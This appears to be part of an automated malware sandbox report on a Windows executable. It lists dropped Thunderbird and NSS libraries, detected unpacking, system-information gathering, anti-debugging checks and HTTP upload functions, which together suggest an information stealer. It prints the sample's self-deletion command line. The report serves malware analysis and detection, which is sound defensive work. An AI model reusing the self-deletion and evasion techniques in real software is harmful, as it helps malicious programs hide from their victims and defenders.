                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

                    Data Obfuscation:

                    barindex
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeUnpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeUnpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004000BB push edx; retf 0_2_004000C2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004407F0 push ecx; ret 0_2_00440803
                    Source: AccessibleHandler.dll.0.drStatic PE information: section name: .orpc
                    Source: AccessibleMarshal.dll.0.drStatic PE information: section name: .orpc
                    Source: IA2Marshal.dll.0.drStatic PE information: section name: .orpc
                    Source: lgpllibs.dll.0.drStatic PE information: section name: .rodata
                    Source: MapiProxy.dll.0.drStatic PE information: section name: .orpc
                    Source: MapiProxy_InUse.dll.0.drStatic PE information: section name: .orpc
                    Source: mozglue.dll.0.drStatic PE information: section name: .didat
                    Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,0_2_0042A2F9
                    Source: ucrtbase.dll.0.drStatic PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.97515614602
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Self deletion via cmd deleteShow sources
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeProcess created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeProcess created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004206DD
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe TID: 2212Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 6612Thread sleep count: 93 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dllJump to dropped file
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_00437819
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043EFDD
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045C559 IsDebuggerPresent,OutputDebugStringW,0_2_0045C559
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,0_2_0042A2F9
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,0_2_00433882
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h]0_2_0045A03D
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h]0_2_0045A081
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h]0_2_0045A0B2
